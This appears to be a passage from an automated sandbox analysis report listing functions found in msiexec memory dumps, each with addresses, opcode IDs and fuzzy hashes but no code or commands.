                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f2a031389b866f35098994b49a3fac6fdee326092ab75fe6168558b501adddd7
                                                                                                                                                                                    • Instruction ID: 14768009192a5a4ec9d3b32935bc7926eac41da35650f0b0dc3d842bd5a056cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2a031389b866f35098994b49a3fac6fdee326092ab75fe6168558b501adddd7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44C1A178E01218CFDB54DFA5C994B9DBBB2BF89300F1080A9D809AB359DB359E85CF10
                                                                                                                                                                                    Function 24010D48 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 132cc179bc7f0200c3cd2a66ce6eabc5036732657f36a4f28adef3dea17ac466
                                                                                                                                                                                    • Instruction ID: 2ab931ac5a151a49bd9f89bcfb10219534b9eddd264c4dfdf8f5d2d8b80a0c8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 132cc179bc7f0200c3cd2a66ce6eabc5036732657f36a4f28adef3dea17ac466
                                                                                                                                                                                    • Instruction Fuzzy Hash: E9C1B174E01218CFDB54DFA5C994B9DBBB2BF89304F1084A9D809AB359DB359E85CF10
                                                                                                                                                                                    Function 24012758 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 91943f33ffc808d442e48c085fe7a9b78c71df1ea8ddd13f810d29e85bfe4591
                                                                                                                                                                                    • Instruction ID: c130cdb94f5eb875fa200dbfa215338d33a47638924b45c37b118da53c8bc6f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 91943f33ffc808d442e48c085fe7a9b78c71df1ea8ddd13f810d29e85bfe4591
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D809BB359DB359A85CF11
                                                                                                                                                                                    Function 24015780 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d6bd01952eee74d02b967837caedbab9b63e8567a0cc6888171b1d0329539b05
                                                                                                                                                                                    • Instruction ID: 0e930ce9273925817da58d951d0ea055fab94b5839c6ff51b562972aac445add
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6bd01952eee74d02b967837caedbab9b63e8567a0cc6888171b1d0329539b05
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AC1B274E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D809AB359DB359E85CF50
                                                                                                                                                                                    Function 240111A0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 74083e34d56bf951db25dac5aa67e0f08fb1a440e1f48279fa618c379db59b0b
                                                                                                                                                                                    • Instruction ID: b4624d9bd9f9917a9599feca25b33ac44b19b589e4b0cac3872063396e73dcc0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74083e34d56bf951db25dac5aa67e0f08fb1a440e1f48279fa618c379db59b0b
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBC1B278E01218CFDB54DFA5C994B9DBBB2BF89300F1080A9D809AB359DB359E85CF51
                                                                                                                                                                                    Function 24012BB0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cc269facd8170cc85d083444b7f9f52d60451134f75d28760295d17252490060
                                                                                                                                                                                    • Instruction ID: 61c6dc84c8f7e76c3d81fea952a91872519ddbf1ba6981238c33232c406749f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc269facd8170cc85d083444b7f9f52d60451134f75d28760295d17252490060
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CC1A178E00218CFDB54DFA5C994B9DBBB2BF89304F1084A9D809BB359DB359A85CF10
                                                                                                                                                                                    Function 24015BD8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5c416f9d68faedfcd46634e69040ff2d7052559abf643bb0ec721e085a9f3c2f
                                                                                                                                                                                    • Instruction ID: 256eb2466c5c87861f1cd5ec1bd59a3bb6b3e6723d9a209fc7e38a9255e51d9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c416f9d68faedfcd46634e69040ff2d7052559abf643bb0ec721e085a9f3c2f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC1A178E01218CFDB54DFA5C994B9DBBF2BF89300F1084A9D809AB359DB359A85CF10
                                                                                                                                                                                    Function 240115F8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 68b8110c241c430c09ea73b2c245bded10f4c20996e0ed08e371a71e17bd87a5
                                                                                                                                                                                    • Instruction ID: 7c68c00f993d7b984eea0d87f1a4977c3cccf7ca22633d115228e313ada52882
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68b8110c241c430c09ea73b2c245bded10f4c20996e0ed08e371a71e17bd87a5
                                                                                                                                                                                    • Instruction Fuzzy Hash: EAC1B274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB359DB359E85CF10
                                                                                                                                                                                    Function 0307F974 Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 57e8ee275257575a5016e210ea38d84f61fdfc22ede8f37f69c3d2f9dc4a3e53
                                                                                                                                                                                    • Instruction ID: 4a3bb25a5aa7d17c8c2e4e1da919776ecb3c54ad01815f3b98d4389e7f892d6d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57e8ee275257575a5016e210ea38d84f61fdfc22ede8f37f69c3d2f9dc4a3e53
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C1C274E01219CFDB54DFA5C994B9DBBB2BF89300F2084A9D809AB359DB359E85CF10
                                                                                                                                                                                    Function 21A50673 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c0e3ce865d64d9fc9012831d71894a366b7e28fb1f1aa756135c0e0b85a98434
                                                                                                                                                                                    • Instruction ID: d64693ab394ad2b90118a7f241dba46c8f4b9b7426ebb1ffc90de330dc1cf12d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0e3ce865d64d9fc9012831d71894a366b7e28fb1f1aa756135c0e0b85a98434
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78A1AB74E05228CFDB65DF24C994B9ABBB2BF8A300F1085EAD40DA7254DB359E81CF51
                                                                                                                                                                                    Function 0307F2C0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cf0b2bde9ad516bb6fed45d3d78803e6be0554df12187df5d167281197fe75c4
                                                                                                                                                                                    • Instruction ID: 45afbf8044d40ec52c982b5320a3ba72b749473664dc114d09ea65891dcd550b
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf0b2bde9ad516bb6fed45d3d78803e6be0554df12187df5d167281197fe75c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95513470D46209CBDB04EFA9C494BEDFBF2BF89300F149529D404AB298DB759886CF58
                                                                                                                                                                                    Function 0307F4AC Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 204b87cf00781f2c4ae86f26a5f64489e0d158989a2c7887ba422db3571f933d
                                                                                                                                                                                    • Instruction ID: 9571071e4a742abf25b01f2386eb4bf62244115c361727f09fe9f004aadd9405
                                                                                                                                                                                    • Opcode Fuzzy Hash: 204b87cf00781f2c4ae86f26a5f64489e0d158989a2c7887ba422db3571f933d
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD511374D4620ACFCB10DFA8D494BEDBBB2BF49300F249559D415AB684D7399881CF58
                                                                                                                                                                                    Function 21A50853 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: edadb2e4c5f19b073e4a2f10b621c0144960481eb32f4424fff18e656c11bc89
                                                                                                                                                                                    • Instruction ID: e6679b641406aec13020ed6841e1e056311fa654abe352edebb95ae60e4717b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: edadb2e4c5f19b073e4a2f10b621c0144960481eb32f4424fff18e656c11bc89
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E51AF74A45228CFCB65DF24C994B9EB7B2BF4A301F1085E9D80AA7354DB359E82CF50
                                                                                                                                                                                    Function 2401B081 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5aa8368081976aa28b4b921768ac7477420e5adb7c332b171ebc8813293e8e86
                                                                                                                                                                                    • Instruction ID: 9a6e32c5948db71f55191870837da48000bf4238857509467275cfb0982b3cba
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aa8368081976aa28b4b921768ac7477420e5adb7c332b171ebc8813293e8e86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A41BAB4E122199FCB04CFA8D594BEEBBF1AF49304F1454A9E418B7390D7389A41CF95
                                                                                                                                                                                    Function 03077700 Relevance: 10.4, Strings: 8, Instructions: 450COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                                    • API String ID: 0-1932283790
                                                                                                                                                                                    • Opcode ID: 155c97b14de53bc7c3bee8f52de6d15a49a2b2d73a9686a02d5e77a849813466
                                                                                                                                                                                    • Instruction ID: 33bf7254610049b66a74e006081d080b93ae148bace51f1281ba89daacbfd5ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 155c97b14de53bc7c3bee8f52de6d15a49a2b2d73a9686a02d5e77a849813466
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22126830A012099FCB64CF68C984AAEBBF2FF88754F1485A9E4199B361D731ED45CB94
                                                                                                                                                                                    Function 030776F1 Relevance: 5.3, Strings: 4, Instructions: 273COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                                                                    • API String ID: 0-1978863864
                                                                                                                                                                                    • Opcode ID: 821222fa2ea8510b976985255e3a5ab2e83cebed742c4517e8c0551e352923d0
                                                                                                                                                                                    • Instruction ID: cc7c09cb288dcf05a63948a2ce7c49385f945546ed6010440456fff5d4f8a7ea
                                                                                                                                                                                    • Opcode Fuzzy Hash: 821222fa2ea8510b976985255e3a5ab2e83cebed742c4517e8c0551e352923d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: A5C15830E012099FCB54CFA9C984AAEBBF6FF88754F148599E815EB361D730E941CB94
                                                                                                                                                                                    Function 03076920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                                                    • API String ID: 0-3001612457
                                                                                                                                                                                    • Opcode ID: 2058e41df3c3839e8261cecf027f8e5a0258a359f3e03acaab3c1d4abdb5476b
                                                                                                                                                                                    • Instruction ID: af72c4deab23bed02d7b7226922cad5ccd446eda9969ca6d3e7dce8619042e62
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2058e41df3c3839e8261cecf027f8e5a0258a359f3e03acaab3c1d4abdb5476b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E01B531F41A088FCB54CE2DC544929B7EFAFC8B607194469D447CB3B4DA32EC418754